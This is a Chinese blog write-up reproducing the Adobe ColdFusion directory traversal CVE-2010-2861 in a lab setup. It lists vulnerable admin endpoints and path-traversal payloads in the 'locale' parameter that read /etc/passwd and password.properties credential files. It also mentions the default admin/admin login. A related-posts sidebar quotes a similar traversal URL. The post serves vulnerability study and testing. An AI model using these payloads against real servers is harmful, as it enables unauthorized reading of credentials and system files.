漏洞复现----17、Adobe ColdFusion目录遍历漏洞 (CVE-2010-2861)

已于 2022-05-30 15:30:31 修改
阅读量1k 收藏 4
点赞数 1
分类专栏: # 漏洞复现 网络安全技术 文章标签: CVE-2010-2861
于 2021-10-21 17:27:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sycamorelg/article/details/118219714
版权

文章目录

一、漏洞介绍

Adobe ColdFusion是JJ Allaire 于 1995 年创建的商业快速Web应用程序开发计算平台。其运行的CFML(ColdFusion Markup Language)针对Web应用的一种脚本语言。文件以*.cfm为文件名,在ColdFusion专用的应用服务器环境下运行。5.0以后,cfm文件被编译器翻译为对应的 c++ 语言程序,然后运行并向浏览器返回结果。

漏洞版本:9.0.1版本及之前版本
漏洞危害:
远程攻击者可以通过以下接口设置locale参数来读取任意文件:
1、CFIDE/administrator/settings/mappings.cfm
2、logging/settings.cfm 
3、datasources/index.cfm
4、j2eepackaging/editarchive.cfm
5、CFIDE/administrator/enter.cfm

二、漏洞环境

1、环境

访问ip:port/CFIDE/administrator/enter.cfm进入初始化页面,输入密码admin初始化服务器。
在这里插入图片描述
初始化后页面如下:
在这里插入图片描述

2、Payload

此次漏洞没有做任何的校验,重点是找到接口位置,以及更改local参数。
部分payload如下:
locale=../../../../../../../etc/passwd%00en
locale=../../../../../../../lib/password.properties%00en
locale=../../../../../../../servers/cfusion/cfusion-ear/cfusion-war/WEB-INF/cfusion/lib/password.properties%00en

三、漏洞复现

1、logging/settings.cfm

1.1、接口位置
在这里插入图片描述

1.2、修改请求包
在这里插入图片描述

2、datasources/index.cfm

2.1、接口位置
在这里插入图片描述
2.2、抓取请求包
在这里插入图片描述

2.3、修改请求包
在这里插入图片描述

3、j2eepackaging/editarchive.cfm

3.1、接口位置
在这里插入图片描述

3.2、抓取请求包
在这里插入图片描述

3.3、修改请求包locale参数,读取/etc/passwd
在这里插入图片描述

4、CFIDE/administrator/settings/mappings.cfm

4.1、接口位置
在这里插入图片描述
4.2、抓取请求包
在这里插入图片描述

4.3、修改请求包
在这个接口,没有找到含有locale参数的get或者post请求包,所以构造locale参数,添加&locale=../../../../../../../../../../etc/passwd%00en
在这里插入图片描述

5、CFIDE/administrator/enter.cfm

5.1、退出登录,使用admin/admin登陆时抓取请求包
在这里插入图片描述

5.2、抓取请求包
在这里插入图片描述

5.3、修改请求包
在这个接口,没有找到含有locale参数的get或者post请求包,所以构造locale参数,添加&locale=../../../../../../../../../../etc/passwd%00en
在这里插入图片描述

四、特殊构造

1、路径后不跟参数值,失败。

在这里插入图片描述

2、路径后参数值为数字,成功。

在这里插入图片描述

3、路径后参数值为字母,成功。

在这里插入图片描述

4、路径后参数值为特殊符号,成功。

在这里插入图片描述

李沉肩
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
coldfusion-10-11-xss:CVE-2015-0345 (APSB15-07) 的概念验证代码
05-31
ColdFusion 10.x 11.x XSS -> RCE PoC 漏洞利用 此存储库包含 CVE-2015-0345 (APSB15-07) 的 XSS 向量,允许在 ColdFusion 安装上获得远程命令执行。 此漏洞仅对 ColdFusion 10 和 11 安装有效。 具体来说,...
Dreamweaver-CS5-网页制作.ppt
11-15
6. Dreamweaver 的应用:Dreamweaver 可以使用以下五种服务器技术来设计 Web 应用程序:ColdFusion、ASP、ASP.NET、JSP 和 PHP。 7. Dreamweaver 的功能:Dreamweaver 提供了许多功能强大的工具和功能,例如可视化...
Adobe ColdFusion 目录遍历漏洞 (CVE-2010-2861)
zzzzz1284的博客
01-04 326
CVE-2010-2861
SciTED编辑器的汉化
weixin_34195142的博客
11-30 235
为什么80%的码农都做不了架构师?>>> ...
09 - vulhub - Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
最新发布
碧海朝天素
05-14 767
如果你也是看准了Python,想自学Python,在这里为大家准备了丰厚的免费大礼包,带大家一起学习,给大家剖析Python兼职、就业行情前景的这些事儿。
Blazor 部署 pdf.js 不能正确显示中文资源解决办法
alex_zoucn的博客
12-07 857
在Blazor项目嵌入 pdf.js 时不能正确显示中文,浏览器F12显示如下错误错误 l10n.js /web/locale/locale.properties not found.我找到了解决方案。它不仅消除了上面提到的错误(即 404 - locale.properties not found),还消除了我收到的 200 多个警告。###Core静态文件添加一个新的 MIME 类型:参考阅读ASP.NET Core 中的静态文件 ###IIS我所要做的就是在 IIS 中添加一个新的 MIME 类型:
漏洞分析|Adobe ColdFusion WDDX 序列化漏洞利用
m0_46699477的博客
09-07 352
本文将分享继 CVE-2023-29300 之后的不出网利用方式,提出 C3P0 和 JGroups 两条基于服务错误部署的新利用链。现 Goby 中实现了 C3P0 和 JGroups 利用链的完整利用,完全支持命令执行以及结果回显功能。
Adobe ColdFusion 文件读取漏洞CVE-2010-2861复现,python编写POC和EXP
wangqiao258的博客
09-30 462
Adobe ColdFusion 文件读取漏洞CVE-2010-2861复现,python编写POC 环境搭建 使用vulhub,进入对应文件夹启动Adobe CanFusion 8.0.1版本服务器: [root@localhost ~]# cd /home/vulhub-master/coldfusion/CVE-2010-2861/ [root@localhost CVE-2010-2861]# docker-compose up -d 查看端口: [root@localhost ~]# d
coldbox-docs:官方ColdBox MVC平台文档
04-13
描述ColdBox是ColdFusion(CFML)的基于约定的HMVC开发框架。介绍ColdBox HMVC平台-v6.x ColdBox分层MVC是面向ColdFusion(CFML)开发人员的事实上的企业级HMVC框架。 它是专业支持的,基于约定的,模块化的,高度可...
从三层架构到MVC-MVP
03-02
最近几年被推荐为Sun公司J2EE平台的设计模式,并且受到越来越多的使用ColdFusion和PHP的开发者的欢迎。模型-视图-控制器模式是一个有用的工具箱,它有很多好处,但也有一些缺点。二.MVC是否适合进行大项目的开发...
COLDFUSION(CVE-2010-2861) 本地包含利用方法
weixin_33817333的博客
03-08 143
mickey · 2014/04/19 13:55最近看老外的一篇文章说,CVE-2010-2861这个利用方法,只有看到过通过读取password.properties里的password字段,破解SHA-1值登陆后台,或者通过传递哈希登陆后台的,还没见过能直接得到SHELL的。其实我以前和小伙伴讨论过利用application.log本地包含CFM的方法,当时的利用方法是这样的:首先看看app...
locale.properties
03-25
Scite中文汉化插件Scite中文汉化插件Scite中文汉化插件Scite中文汉化插件
Vulhub-coldfusion--CVE-2010-2861
Ronin_qianmo的博客
07-29 209
1、漏洞描述 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 2、启动靶场 3、访问地址 http://x.x.x.x:8500 4、找到登录界面 http://x.x.x.x:8500/CFIDE/administrator/index.cfm 默认登录的用
CISA紧急提醒:Adobe ColdFusion漏洞已遭在野利用
smellycat000的专栏
03-16 1093
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士3月15日,美国网络安全和基础设施安全局 (CISA) 将影响 Adobe ColdFusion 的一个漏洞新增到已知利用漏洞 (KEV) 分类中。该漏洞的编号是CVE-2023-26360,CVSS评分为8.6,可用于实现任意代码执行后果。CISA指出,“Adobe ColdFusion 中包含一个访问控制不当漏洞,可导致远程代码执行后果。”该...
Adobe ColdFusionCVE-2010-2861)文件读取漏洞复现
qq_44504968的博客
09-23 1231
Adobe ColdFusion文件读取漏洞CVE-2010-2861漏洞原理实验环境漏洞环境漏洞复现 漏洞原理 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 由于AJP协议设计存在缺陷导致内部相关的属性可控,攻击者可以构造属性值,使未授权的用户读取服务器任意文件获得敏感信息,甚至可以进行远程代码执行漏洞的利用。 Adobe ColdFusion 8、9版本中
ColdFusion 9 / 10 Remote Root xday
cnbird's blog
05-09 2673
www.awsurveys.com//CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../../etc/hosts&attributes.
ColdFusion8目录遍历漏洞
笨笨的专栏
11-01 834
ColdFusion8中setting.cfm的locale参数存在目录遍历漏洞,ke
web 工程课件 西安电子科技大学-软件工程
11-21
* 课程内容:不包括HTML、JavaScript、ActiveX、Flash、PHP、ColdFusion等编程语言的细节,也不包括Web服务器、Servlet引擎设置、人机界面工程等内容 三、评估方式 * 个人表现:出勤、作业、项目、考试等 * 评估...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值